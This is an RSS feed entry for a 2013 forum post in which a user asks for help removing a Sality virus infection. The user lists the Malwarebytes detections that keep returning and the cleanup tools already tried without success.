			<pubDate>Sun, 24 Mar 2013 16:52:34 +0000</pubDate>
			<description>Hi Fellows, Actually my PC is infected by virus. I downloaded and updated MBAM and performed quick scan (more than a few times) and keep getting &quot;6&quot; detections which seems MBAM is not able to remove them (even after restarting on completion of scan every time). I also tried &quot;CCLEANER&quot; &quot;SUPERSPY ...</description>
			<content:encoded><![CDATA[ <p>Hi Fellows,<br />
Actually my PC is infected by virus. I downloaded and updated MBAM and performed quick scan (more than a few times) and keep getting "6" detections which seems MBAM is not able to remove them (even after restarting on completion of scan every time).<br />
I also tried "CCLEANER" "SUPERSPY REMOVAL" "MICROSOFT SECURITY ESSENTIALS" but still no luck.</p>

<p>Following are the details of MBAM detections that keep on coming up every time I scan the system.</p>

<p>Malware.Packer.Gen (Vendor)........... C:\iodq.exe<br />
Virus.Sality (Vendor)........................... Registry key<br />
Virus.Sality (Vendor)........................... Registry key<br />
PUM.Disabled.SecurityCenter............ Registry Data<br />
PUM.Disabled.SecurityCenter............ Registry Data<br />
PUM.Disabled.SecurityCenter............ Registry Data</p>

<p>Please help out to remove trojan completely from my machine.</p>

<p>[P.S. some programs are popping out this error (runtime error r6002 floating point) when I try to execute them]</p>

<p>Thanks,</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>Its.Obi</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/450869/pc-infected-by-virus-and-antivirus-isnt-able-to-remove-them-please-help</guid>
		</item>
			</channel>
</rss>